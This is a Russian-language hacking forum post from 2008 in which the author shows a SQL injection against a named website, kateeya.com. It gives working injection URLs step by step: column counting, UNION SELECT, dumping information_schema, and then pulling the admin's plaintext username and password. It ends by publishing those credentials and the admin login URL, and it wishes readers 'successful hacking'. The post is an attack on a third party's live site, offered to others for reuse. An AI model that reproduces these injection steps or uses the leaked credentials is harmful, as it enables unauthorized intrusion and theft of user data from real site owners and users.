01.10.2008, 18:32
|
|
Новичок
Регистрация: 16.09.2008
Сообщений: 8
Провел на форуме:
102861
Репутация:
25
|
|
Вот ещё нашёл сайтеГ =)
Вообщем, проверяем и видим ошибочку скулЯ
Код:
http://www.kateeya.com/content.php?menu=-2'
имеем 6 полей одно принтабельное - 2
Код:
http://www.kateeya.com/content.php?menu=2+order+by+6--
http://www.kateeya.com/content.php?menu=2+union+select+1,2,3,4,5,6--
Версия скули 5-я
Значит заюзаем information_schema
Код:
http://www.kateeya.com/content.php?menu=2+union+select+1,concat_ws(0x3a3a3a,table_name,column_name),3,4,5,6++from+information_schema.columns--
нам тут полный фарт, видим все таблицы с полями, ищем интерессные.....а это
siji_user:::user_id - идентификаторы
siji_user:::user_name - юзеры
siji_user:::user_pwd - пароли в чистом виде
siji_user:::user_email - мылы
смотрим и видим одну запись....которая нас радует и при этом поднимает настроение =)))))
Код:
http://www.kateeya.com/content.php?menu=2+union+select+1,concat_ws(0x3a3a3a,user_name,user_pwd),3,4,5,6++from+siji_user--
Конечный итог:
Username: admin
Password: admin
Админка: http://www.kateeya.com/admin/login.php
----
Пока что всё, всем приятного и удачного хакинга =)))) |
|
|